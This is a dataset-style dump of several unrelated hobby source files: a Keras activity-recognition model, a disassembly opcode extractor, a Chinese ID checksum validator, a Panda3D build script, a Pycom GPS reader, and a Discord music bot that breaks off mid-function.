blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
823a562f2701ed4bfb01d324513c92806e997c63 | 8be0a2dce4702ad31a147e79c3501d92a19037b8 | /sensor/res/activity_recognition.py | 7ae2288df12d9e3f0044c99429bf89c61a8729df | [] | no_license | geochri/Human-Activity-Recognition-final-semester-project | 24ec496958752d1f5cda981d14c9471dc0b57d45 | 4b0181bbfdd4d209670acad19294fc3a1e962495 | refs/heads/master | 2020-05-31T02:09:40.802497 | 2018-07-27T14:50:43 | 2018-07-27T14:50:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,720 | py | from pathlib import Path
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout
from keras import optimizers
import datetime
from functools import lru_cache
@lru_cache()
def main():
random_seed = 611
np.random.seed(random_seed)
plt.style.use('ggplot')
def readData(filePath):
# attributes of the dataset
columnNames = ['user_id', 'activity', 'timestamp', 'x-axis', 'y-axis', 'z-axis']
data = pd.read_csv(filePath, header=None, names=columnNames, na_values=';', low_memory=False)
# pprint(data)
return data
# def featureNormalize(dataset):
# mu = np.mean(dataset, axis=0)
# sigma = np.std(dataset, axis=0)
# return (dataset - mu) / sigma
# #
# def plotAxis(axis, x, y, title):
# axis.plot(x, y)
# axis.set_title(title)
# axis.xaxis.set_visible(False)
# axis.set_ylim([min(y) - np.std(y), max(y) + np.std(y)])
# axis.set_xlim([min(x), max(x)])
# axis.grid(True)
#
# def plotActivity(activity, data):
# fig, (ax0, ax1, ax2) = plt.subplots(nrows=3, figsize=(15, 10), sharex=True)
# plotAxis(ax0, data['timestamp'], data['x-axis'], 'x-axis')
# plotAxis(ax1, data['timestamp'], data['y-axis'], 'y-axis')
# plotAxis(ax2, data['timestamp'], data['z-axis'], 'z-axis')
# plt.subplots_adjust(hspace=0.2)
# fig.suptitle(activity)
# plt.subplots_adjust(top=0.9)
# plt.show()
#
#
def windows(data, size):
start = 0
while start < data.count():
yield int(start), int(start + size)
start += (size / 2)
def segment_signal(data, window_size=90):
segments = np.empty((0, window_size, 3))
labels = np.empty((0))
for (start, end) in windows(data['timestamp'], window_size):
x = data['x-axis'][start:end]
y = data['y-axis'][start:end]
z = data['z-axis'][start:end]
if (len(data['timestamp'][start:end]) == window_size):
segments = np.vstack([segments, np.dstack([x, y, z])])
labels = np.append(labels, stats.mode(data['activity'][start:end])[0][0])
return segments, labels
#
dataset = readData("H:/projects/8thseme/src/sensor/res/tracker.txt")
# for activity in np.unique(dataset['activity']):
# subset = dataset[dataset['activity'] == activity][:180]
# print(activity)
# pprint(subset)
# plotActivity(activity, subset)
segments, labels = segment_signal(dataset)
labels = np.asarray(pd.get_dummies(labels), dtype=np.int8)
numOfRows = segments.shape[1]
numOfColumns = segments.shape[2]
numChannels = 1
numFilters = 128 # number of filters in Conv2D layer
# kernal size of the Conv2D layer
kernalSize1 = 2
# max pooling window size
poolingWindowSz = 2
# number of filters in fully connected layers
numNueronsFCL1 = 128
numNueronsFCL2 = 128
# split ratio for test and validation
trainSplitRatio = 0.8
# number of epochs
Epochs = 10
# batchsize
batchSize = 10
# number of total clases
numClasses = labels.shape[1]
# dropout ratio for dropout layer
dropOutRatio = 0.2
# reshaping the data for network input
reshapedSegments = segments.reshape(segments.shape[0], numOfRows, numOfColumns, 1)
# splitting in training and testing data
trainSplit = np.random.rand(len(reshapedSegments)) < trainSplitRatio
trainX = reshapedSegments[trainSplit]
testX = reshapedSegments[~trainSplit]
trainX = np.nan_to_num(trainX)
testX = np.nan_to_num(testX)
trainY = labels[trainSplit]
testY = labels[~trainSplit]
def cnnModel():
model = Sequential()
# adding the first convolutionial layer with 32 filters and 5 by 5 kernal size, using the rectifier as the activation function
model.add(
Conv2D(numFilters, (kernalSize1, kernalSize1), input_shape=(numOfRows, numOfColumns, 1), activation='relu'))
# adding a maxpooling layer
model.add(MaxPooling2D(pool_size=(poolingWindowSz, poolingWindowSz), padding='valid'))
# adding a dropout layer for the regularization and avoiding over fitting
model.add(Dropout(dropOutRatio))
# flattening the output in order to apply the fully connected layer
model.add(Flatten())
# adding first fully connected layer with 256 outputs
model.add(Dense(numNueronsFCL1, activation='relu'))
# adding second fully connected layer 128 outputs
model.add(Dense(numNueronsFCL2, activation='relu'))
# adding softmax layer for the classification
model.add(Dense(numClasses, activation='softmax'))
# Compiling the model to generate a model
adam = optimizers.Adam(lr=0.001, decay=1e-6)
model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])
for layer in model.layers:
print(layer.name)
model.fit(trainX, trainY, validation_split=1 - trainSplitRatio, epochs=10, batch_size=batchSize, verbose=2)
score = model.evaluate(testX, testY, verbose=2)
print('Baseline Error: %.2f%%' % (100 - score[1] * 100))
return model
model = cnnModel()
return model
# x = 2
# while x > 1:
# prediction = model.predict(inputdata.reshape(-1, 90, 3, 1))
# labe = ['downstair', 'jogging', 'sitting', 'standing', 'upstair', 'walking']
# result = labe[np.argmax(prediction)]
# print(result)
| [
"sushil79g@gmail.com'git config --global user.name 'Sushil Ghimire'git config --global user.email sushil79g@gmail"
] | sushil79g@gmail.com'git config --global user.name 'Sushil Ghimire'git config --global user.email sushil79g@gmail |
fec017b8a3c987e59ae43429ec103b5e6a3c99d3 | 49e280f7448443a2e85609a1c21dc619c08f80e6 | /post_recent/rf_OXcase_anal.py | 112b8f66d92898c894a7448df0ec030a90d623f3 | [] | no_license | livjgovob0614/w | c9062e2b9e66b37e9b5491ef73c22fe98fdecf40 | 645c75b5009ef8368699b124eda6ec661815cd09 | refs/heads/master | 2022-12-29T12:33:55.424182 | 2020-10-12T09:44:51 | 2020-10-12T09:44:51 | 301,337,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,262 | py | import sys, os, glob
import subprocess
os.chdir("/home/jg/kby/disasm/output/200712_232705/")
fl= []
f = open("/home/donghoon/ssd/jg/20/learning/rf/fo", 'r')
fl.append(f.readlines())
f.close()
f = open("/home/donghoon/ssd/jg/20/learning/rf/fx", 'r')
fl.append(f.readlines())
f.close()
hexf=[]
f = open("/home/donghoon/ssd/jg/20/learning/rf/fo_hex", 'r')
hexf.append(f.readlines())
f.close()
f = open("/home/donghoon/ssd/jg/20/learning/rf/fx_hex", 'r')
hexf.append(f.readlines())
f.close()
out_f=[]
out_f.append(open("/home/donghoon/ssd/jg/20/learning/rf/result/fo_op.list", 'w'))
out_f.append(open("/home/donghoon/ssd/jg/20/learning/rf/result/fx_op.list", 'w'))
fidx = 0
for f in fl:
if fidx == 0:
fidx = 1
else:
fidx = 2
print (str(fidx)+"th try")
op_list = []
l = -1
while l < len(f)-1:
l += 1
spl = f[l].split()
st = hex(int(spl[2],16))
fn = spl[0]
print ("** new fn: " + fn)
f2 = open(fn+"/funcText", "r")
lines = f2.readlines()
f2.close
i = -1
while i < len(lines)-1:
op = []
i += 1
spl2 = lines[i].split()
try:
adr = hex(int(spl2[0].split(':')[1], 16))
except IndexError:
if len(lines[i]) < 3 or lines[i][:2] != "**":
print ("error1")
print (lines[i])
sys.exit()
continue
if st == adr:
while (True):
save_addr= 0
try:
next_adr = hex(int(lines[i+1].split()[0].split(':')[1], 16))
except IndexError:
if len(lines[i+1]) < 3 or lines[i+1][:2] != "**":
print ("error2")
print (lines[i])
sys.exit()
i += 1
continue
# ~~~ or same, but one instr function
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print (lines[i])
if adr != next_adr or "// starts at " in lines[i+1] or "End of function" in lines[i+1]:
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print ("out1")
# print (lines[i])
# print (lines[i+1])
break
i += 1
ex = False
## if last line, -- ##
if i == len(lines)-1:
while (True):
i -= 1
spl2 = lines[i].split()
#if len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " ":
#### test... "not" correct? ####
if not (len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45]) or "WEAK" in lines[i][39:43]:
ex = True
break
if ex:
break
#print ("error3")
#print ("fn: " + fn)
#print (hex(int(lines[i-1].split()[0].split(':')[1], 16)))
#sys.exit()
# Check Operation Code
spl2 = lines[i].split()
k = 0
DCB, DCD, DCQ = 0, 0, 0
while k < 5:
op.append(spl2[1])
# test
#if op[-1] == ";" or "loc_" in op[-1]:
'''
if op[-1] == "ALIGN":
print ("err1")
print (fn)
for o in op:
print (o)
print (lines[i])
sys.exit()
'''
k += 1
# *******************************************************
# ****************** DC & ALIGN CHECK *******************
# *******************************************************
# if previous operand == DCB: 4 to 1, DCD: 1 to 1, DCQ: 1 to 2
if "ALIGN" in op[-1]:
diff = int(lines[i+1].split()[0].split(':')[1],16) - int(lines[i].split()[0].split(':')[1],16)
if diff < 4:
print("err101")
sys.exit()
if diff % 4:
print("err102")
sys.exit()
op.pop()
k -= 1
for dd in range(int(diff/4)):
# XXX op.append(''.join(hexf[fidx-1][l].split()[4*(k-1):4*k]))
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
if k == 5:
break
if "DC" in op[-1]:
spl3 = lines[i].split(',')
spl4 = lines[i].split()
add = 0
if lines[i].split()[1][:2] != "DC":
add_ = 1
if op[-1] == "DCB":
if DCB:
assert(len(spl3) == 0, "err6, fn:" + fn + "\nlines: " + lines[i])
if DCB < 4:
DCB_str += hexf[fidx-1][l].split()[4*(k-1) + DCB]
if DCB == 4:
DCB = 0
op[-1] == DCB_str
DCB_str = ""
else:
DCB += 1
k -= 1
else:
assert(False, "err7")
#print ("err6")
#sys.exit()
elif len(spl3) == 1:
DCB_str += hexf[fidx-1][l].split()[4*(k-1)]
DCB += 1
k -= 1
elif len(spl3) == 4:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
else:
print ("err8")
sys.exit()
elif op[-1] == "DCD":
if len(spl3) == 1:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
elif len(spl3) == 4:
print ("err100")
sys.exit()
else:
print ("err9")
sys.exit()
# DCQ #
else:
if len(spl3) == 1:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
if k < 5:
k += 1
op.append(''.join(hexf[fidx-1][l].split()[4*(k-1):4*k]))
else:
#elif len(spl3) == 4:
op.pop()
k -= 1
while k < 5:
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
i += 1
if i == len(lines)-1:
break
# ***********************************************************************
# ****************** if function end, find next instr *******************
# ***********************************************************************
spl2 = lines[i].split()
#if len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " ":
if len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45] or "WEAK" in lines[i][39:43]:
if not save_addr:
save_addr = i
# XXX newF[k-1] = 1
#while not (i == len(lines)-1 or len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " "):
while i+1 < len(lines)-1 and (len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45]) or "WEAK" in lines[i][39:43]:
i+=1
spl2 = lines[i].split()
'''
if "ALIGN" in lines[i]:
print ("********ALIGN")
if (lines[i][39:40] != " "):
print ("33")
print (lines[i][39:40])
sys.exit()
if (lines[i][39:41] != "DC"):
print ("11")
sys.exit()
if (lines[i][39:41] != "DC" and lines[i][39:40] == " "):
print ("22")
sys.exit()
'''
#break
if i+1 == len(lines) -1:
break
if not op:
print ("no function start")
sys.exit()
# test
if len(op) == 1 and i+1 < len(lines)-1:
print ("err2")
print (fn)
print (op[0])
print (lines[i])
sys.exit()
if k != 5:
if i+1 < len(lines)-1:
print("err102")
sys.exit()
while k < 5:
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
add = True
for e in op_list:
if e[:-1] == op:
add = False
break
if save_addr:
i = save_addr
if add:
op.append("( "+fn + ", " + st + " )")
op_list.append(op)
if l == len(f) - 1 or f[l+1].split()[0] != fn:
break
l += 1
st = hex(int(f[l].split()[2],16))
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print ("new st:", st)
op_list.sort()
for op in op_list:
for n in op:
if n == op[-1]:
out_f[fidx-1].write(" "+n)
else:
out_f[fidx-1].write("{:10}".format(n))
#out_f.write('\t\t'.join(op))
out_f[fidx-1].write("\n")
print (len(op_list))
out_f[fidx-1].close()
| [
"livjgovob@gmail.com"
] | livjgovob@gmail.com |
3438b512d8bdf0925ccf403bdf6ab92e99dacd88 | 50e475c7387dabf05a8b30fbed260e3e2e8d5fc2 | /src/id_query.py | 716387da822d6c9c6a28eef0125bbbed5bc7142d | [] | no_license | pacopink/mca_district_code | 8b5bd078313d6cf3c29da9075799795ffa037ba8 | 29a2f3f1f1019fd2b870e635911b36bf78bf35d2 | refs/heads/main | 2022-12-27T14:18:50.892298 | 2020-10-16T14:53:03 | 2020-10-16T14:53:03 | 302,510,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,243 | py | #!/usr/bin/env python3
import re
from data_struct import DistrictCodeDate, IdInfo, DISTRICT_CODE_FILE
genders = ('女', '男')
r = re.compile(r'\d{17}[0-9X]')
factors = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
expects = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
def get_code_map():
h = {}
with open(DISTRICT_CODE_FILE, "r", encoding='utf8') as f:
for l in f:
if l[0] == "#":
continue
l = l.strip()
v = l.split(",")
if len(v) != len(DistrictCodeDate._fields):
continue
dist = DistrictCodeDate(*v)
h[dist.code] = dist
return h
def _district_lookup():
"""this is a closure, keep a code_map as h in its context to reuse"""
h = get_code_map()
return lambda c: h.get(c[0:6])
# refer to the closure
district_lookup = _district_lookup()
def get_gender(code):
return genders[int(code[16:17]) % 2]
def checksum(code):
"""根据factors和expects计算输入的身份证号前17位校验和"""
index = sum([factor * int(digit) for factor, digit in zip(factors, code)]) % len(expects)
return expects[index]
def id_validation_check(code):
m = r.match(code)
if m is None:
print("invalid code pattern")
return False
expected_cksum = checksum(code)
# 和实际的第18位比对校验和
if code[17] == expected_cksum:
return True
else:
print("checksum failed: expect=", expected_cksum, "but actual:", code[17])
return False
def parse_id(code, name='NA'):
if not id_validation_check(code):
return None
dist = district_lookup(code)
gender = get_gender(code)
return IdInfo(name=name, code=code, validity=True, gender=gender, district_info=dist, birthday=code[6:14])
if __name__ == '__main__':
while True:
code = input("请输入要查询的身份证号码: ")
code = code.upper()
if code.lower() in ("quit", "exit", "q"):
print("good bye")
break
info = parse_id(code)
if info is None:
print("非法的身份证号码,无法查询!")
else:
print("查询成功!结果:\n", info) | [
"13602887904@163.com"
] | 13602887904@163.com |
187e3394d0b6b0785bd669990a1261ab0b325a6a | 9827506feaa1655c68ad88bf685ccce03d02a686 | /venv/lib/python3.6/enum.py | 42e7f3ca31565192c6da84c93a5785016df1ca0c | [] | no_license | taixingbi/django-postgres-config | 9ea53b0c117aa34605b27c9a9b06fb8cbb57669c | 00309dbe29ea528d94c00c6e6dea4ececde54d2d | refs/heads/master | 2020-04-11T17:00:51.890200 | 2018-12-15T21:32:26 | 2018-12-15T21:32:26 | 161,945,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | /Users/h/anaconda3/lib/python3.6/enum.py | [
"bitaihang@gmail.com"
] | bitaihang@gmail.com |
caea2ec58c57adbd5f5dc9e9a63d8dc2b3c96220 | 85d41b34a472a2ec726b6fe9ebccc19a75159641 | /src/run_interrogate.py | c9fd70730d2eb2e009a3c248d42ab3bec617022d | [] | no_license | toontownretro/libotp | 186dacbe920b39a44840cc568cd76f1ea87ebd03 | 1ddfbd6526e88e887468c3c517a5d07dbc6e59be | refs/heads/master | 2022-12-19T10:55:28.239247 | 2020-09-14T00:59:03 | 2020-09-14T00:59:03 | 245,036,965 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,661 | py | import subprocess
import glob
import sys
import os
srcdir = os.path.abspath(os.path.dirname(__file__))
pandadir = os.path.abspath(sys.argv[1])
def run_command(cmd):
p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, shell=True)
ret = p.wait()
if ret != 0:
print("\n")
print('The following command return a non-zero value (%d): %s' % (ret, cmd))
sys.exit(ret)
def interrogate(module):
print('Interrogating', module)
cmd = os.path.join(pandadir, 'bin', 'interrogate')
cmd += ' -D__inline -DCPPPARSER -DP3_INTERROGATE=1 -D__cplusplus -fnames -string -refcount -assert'
cmd += ' -S"%(pandadir)s/include/parser-inc" -S"%(pandadir)s/include" -I"%(pandadir)s/include" -I"%(srcdir)s/movement" -I"%(srcdir)s/nametag"'
cmd += ' -I"%(srcdir)s/otpbase"'
cmd += ' -srcdir "%(srcdir)s/%(module)s"'
cmd += ' -oc "%(srcdir)s/%(module)s_igate.cxx" -od "%(srcdir)s/lib%(module)s.in" -python-native -DCPPPARSER -D__STDC__=1'
cmd += ' -D__cplusplus -D__inline -D_X86_ -DWIN32_VC -DWIN32 -module libotp -library %(module)s -Dvolatile='
cmd = cmd % {'pandadir': pandadir, 'module': module, 'srcdir': srcdir}
files = glob.glob(os.path.join(srcdir, module, '*.h'))
files += glob.glob(os.path.join(srcdir, module, '*.cxx'))
for file in files:
cmd += ' %s' % os.path.basename(file)
run_command(cmd)
for module in ('movement', 'nametag'):
interrogate(module)
os.chdir(srcdir)
cmd = os.path.join(pandadir, 'bin', 'interrogate_module') + ' -python-native -oc libotp_module.cxx'
cmd += ' -library libotp -module libotp libnametag.in libmovement.in'
run_command(cmd)
| [
"theclashingfritz@users.noreply.github.com"
] | theclashingfritz@users.noreply.github.com |
20fb6e8a4c8e239643488306cfbb45e6487fd668 | e2227cd3f37d0b2fa2520ea83735b057c506d51e | /LoraFTP/gps.py | 6d8eb18a893c27fd8f10c6a2a79f3beace87796a | [] | no_license | megachonker/LoRa | 49b8b87f6609462d0f33464692e928ac25cdbd60 | 0e5419bc00324675bd17257b255cb40b5c3959c0 | refs/heads/master | 2023-02-19T12:17:38.746441 | 2021-01-11T00:54:35 | 2021-01-11T00:54:35 | 271,270,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | import machine # pour pouvoir géré des fichier
import pycom # pour le gestion du module pycom (dans notre cas la led)
import time # pour la gestion des temps d'attente
from L76GNSS import L76GNSS # pour le module gps
from pytrack import Pytrack # shield du modul gps
import _thread
py = Pytrack() # initialisation du shield
l76 = L76GNSS(py, timeout=5) # initialisation GPS
time.sleep(2) # pour pas brusquer
coord=()
def listenGPS():
while True:
global coord
coord = l76.coordinates() #récupération des coordoné GPS#random.randrange(1000)#
_thread.start_new_thread(listenGPS,())
| [
""
] | |
5c60b907ad1b0faa3946a538521a15f672150fa2 | dbfa92bfa039c61268ed1d84b8fd67435a0fa25e | /main.py | b328fa7e858060db4e40f1d64d61a3ac90e180cd | [] | no_license | kravtandr/RACHKO_BOT | 9373c76ea7752c8e63c9460c71d243008e94e25a | 0e76befba8258c8437d8e84df03921ed55380231 | refs/heads/master | 2023-02-13T01:42:37.542818 | 2021-01-21T18:39:11 | 2021-01-21T18:39:11 | 280,113,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,274 | py | """
The MIT License (MIT)
Copyright (c) 2020 kravtandr
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import random
import discord
import asyncio
from discord.ext import tasks, commands
import youtube_dl
#read cfg.txt
f = open('cfg.txt', 'r')
i = 0
for line in f:
if i==0:
line = line.split()
TOKEN = line[2]
i+=1
f.close()
#TOKEN = 'token'
# Suppress noise about console usage from errors
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
def __init__(self, source, *, data, volume=0.5):
super().__init__(source, volume)
self.data = data
self.title = data.get('title')
self.url = data.get('url')
@classmethod
async def from_url(cls, url, *, loop=None, stream=False):
loop = loop or asyncio.get_event_loop()
data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
if 'entries' in data:
# take first item from a playlist
data = data['entries'][0]
filename = data['url'] if stream else ytdl.prepare_filename(data)
return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options,
executable="C:/Users/User/PycharmProjects/RACHKO_BOT/ffmpeg/bin/ffmpeg.exe"), data=data)
class MyContext(commands.Context):
async def tick(self, value):
# reacts to the message with an emoji
# depending on whether value is True or False
# if its True, it'll add a green check mark
# otherwise, it'll add a red cross mark
emoji = '\N{WHITE HEAVY CHECK MARK}' if value else '\N{CROSS MARK}'
try:
# this will react to the command author's message
await self.message.add_reaction(emoji)
except discord.HTTPException:
# sometimes errors occur during this, for example
# maybe you dont have permission to do that
# we dont mind, so we can just ignore them
pass
class MyBot(commands.Bot):
vc = "0" # очень больно так делать
#vc = discord.VoiceClient
last_ctx = None # и так тоже
is_looped = False
curr_track = None
queue = [] # фальшивая очередь для вывода
queue_size = 0
async def get_context(self, message, *, cls=MyContext):
# when you override this method, you pass your new Context
# subclass to the super() method, which tells the bot to
# use the new MyContext class
return await super().get_context(message, cls=cls)
#bot = commands.Bot(command_prefix='!', description="description")
bot = MyBot(command_prefix='!', description="RACHKO-BOT")
queue_async = asyncio.Queue()
bot.remove_command('help')
#ctx.bot.loop.create_task(self.player_loop())
class MyCog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.index = 0
self.player.start()
def cog_unload(self):
print("cog_unload")
self.player.cancel()
#self.printer.stop()
@tasks.loop(seconds=5.0) # main loop
async def player(self):
playing = None
paused = None
print("is_closed - "+str(bot.is_closed()))
if not bot.is_closed():
#check if playing track and connected
playing = bot.vc.is_playing()
paused = bot.vc.is_paused()
print("vc.is_connected() - " + str(bot.vc.is_connected()))
print("vc.is_playing()) - " + str(playing))
print("Status: ", end="")
if playing or paused:
print("playing...")
else:
if bot.is_looped:
await play(ctx= bot.last_ctx, url=bot.curr_track)
#print("repeating " +str(bot.queue[0]))
print("repeating " + str(bot.curr_track))
else:
print("not playing")
# check if we have next track
if have_next():
print("play next song")
print("getting ctx...")
ctx = bot.last_ctx
print("got ctx " + str(ctx))
await next(ctx)
else:
print("No next song")
print("-----------------------------------------")
@player.before_loop
async def before_printer(self):
#time.sleep(5)
print('waiting... for bot ready')
await self.bot.wait_until_ready()
#time.sleep(5)
def have_next():
if queue_async.qsize() > 0:
return True
else:
return False
async def setup():
print("setup")
bot.add_cog(MyCog(bot))
@bot.command(pass_context=True)
async def music(ctx, num = 3): # делает плейлист из уже игравших треков
i = 0
count = 0
all_found = False
nLines = count_lines("music_base.txt")
print("LINES = ", nLines)
while not all_found:
f = open('music_base.txt', 'r')
rand = random.randint(0, nLines)
start = random.randint(0, rand)
for line in f: #line.rstrip() for line in l
line = line.strip()
print("i= " + str(i), "count = " + str(count), start, rand)
if line.isspace():
print("seek 0")
f.seek(0)
if i >= start and i == rand:
if count < int(num):
bot.queue.append(line)
await queue_async.put(line)
print("+ in q " + str(line))
bot.queue_size += 1
count += 1
rand = random.randint(0, nLines)
start = random.randint(0, rand)
i = 0
else:
print("all found")
# bot.queue.reverse()
line = await queue_async.get()
await play(ctx=ctx, url=line)
await queue(ctx)
all_found = True
return
# print(line)
else:
print("i < start and i != rand")
if i<start or i>nLines:
i=start
print("i = ", i," count = ", count)
print("start = ", start, " rand = ", rand)
i+=1
i = 0
f.close()
#await ctx.send(bot.queue_size)
@bot.command(pass_context=True)
async def help(ctx):
'''
await ctx.send("!help - помощь")
await ctx.send("!play - аудио из вк или yt, если уже что-то играет то трек добавляется в очередь. \n"
" (стримы не работают, тк все файлы перед воспроизведением скачиваются) ")
await ctx.send("!music <число треков> - создает плейлист из треков, которые уже играли, по умолчанию размер плейлиста = 3")
await ctx.send("!queue - выводит в текстовый канал текущий плейлист")
await ctx.send("!pause - поставить на паузу аудио")
await ctx.send("!resume - продолжить воспроизведение")
await ctx.send("!next - следующий трек в очереди")
await ctx.send("!cur - текущий трек")
await ctx.send("!disconnect - отключиться из голосового канала")
await ctx.send("!stop - остановить воспроизведение аудио")
'''
await ctx.send("```!help - помощь\n"
"!play - аудио из вк или yt, если уже что-то играет, то трек добавляется в очередь. \n "
" (стримы не работают, тк все файлы перед воспроизведением скачиваются)\n"
"!music <число треков> - создает плейлист из треков, которые уже играли, по умолчанию размер плейлиста = 3\n"
"!loop - вкл/выкл повтор\n"
"!queue - выводит в текстовый канал текущий плейлист\n"
"!pause - поставить на паузу аудио\n"
"!resume - продолжить воспроизведение\n"
"!next - следующий трек в очереди\n"
"!cur - текущий трек\n"
"!clear - очищает плейлист\n"
"!disconnect - отключиться из голосового канала\n"
"!stop - остановить воспроизведение аудио\n"
"=======================================dev================================================================\n"
"!format_music_base - удаляет одинаковые треки из базы```")
@bot.command(pass_context=True)
async def loop(ctx): # создаем асинхронную фунцию бота
bot.is_looped = not bot.is_looped
await ctx.send("Повтор: "+str(bot.is_looped))
@bot.command(pass_context=True)
async def cur(ctx): # создаем асинхронную фунцию бота
await ctx.send("Сейчас играет: " + str(bot.curr_track))
@bot.command(pass_context=True)
async def clear(ctx): # очищаем очередь
await bot.wait_until_ready()
while have_next():
if queue_async.qsize() > 0:
bot.queue.pop(0)
bot.queue_size -= 1
url = await queue_async.get()
bot.queue = [] # фальшивая очередь для вывода
bot.queue_size = 0
await ctx.send("Произошло глубинное очищение")
@bot.command(pass_context=True)
async def join(ctx): # создаем асинхронную фунцию бота
channel = ctx.author.voice.channel
bot.vc = await channel.connect()
await ctx.send("RACHKO-BOT в этом чатике")
@bot.command(pass_context=True)
async def disconnect(ctx): # создаем асинхронную фунцию бота
#await disconnect(*, force=False)
await bot.vc.disconnect()
#await ctx.send("Disconnect")
await ctx.send("Понял. Ушел...")
@bot.command(pass_context=True)
async def play_test(ctx): # играет любой mp3 из папки где находится
bot.vc.play(discord.FFmpegPCMAudio(executable="C:/Users/User/PycharmProjects/RACHKO_BOT/ffmpeg/bin/ffmpeg.exe",
source="testing.mp3"))
await ctx.send("Playing")
@bot.command(pass_context=True)
async def queue(ctx): # создаем асинхронную фунцию бота
if bot.queue_size == 0:
await ctx.send("Ало!!! где треки?")
return
await ctx.send("======================== Наш текущий плейлист ========================")
i = 0
for item in bot.queue:
if i==0:
await ctx.send(">>" + " " + str(item))
else:
await ctx.send(str(i) + " - " + str(item))
i += 1
await ctx.send("======================================================================")
@bot.command(pass_context=True)
async def next(ctx): # создаем асинхронную фунцию бота
bot.last_ctx = ctx
await stop(ctx)
#await ctx.send("Стоп Размер очереди - " + str(bot.queue_size))
if bot.is_looped:
await play(ctx=ctx, url=bot.curr_track)
await ctx.send("Повтор")
else:
if queue_async.qsize() > 0:
print("get next track (next)")
bot.queue.pop(0)
bot.queue_size -= 1
url = await queue_async.get()
# await play(ctx=ctx, url=bot.queue[0])
print("start playing " + str(url))
await play(ctx=ctx, url=url)
await ctx.send("Следующий трек")
else:
print("no more tracks")
# time.sleep(2)
await ctx.send("Ало!!! где треки?")
@bot.command(pass_context=True)
async def play(ctx, *, url):
#f = open('music_base.txt', 'w')
f = open('music_base.txt', 'a')
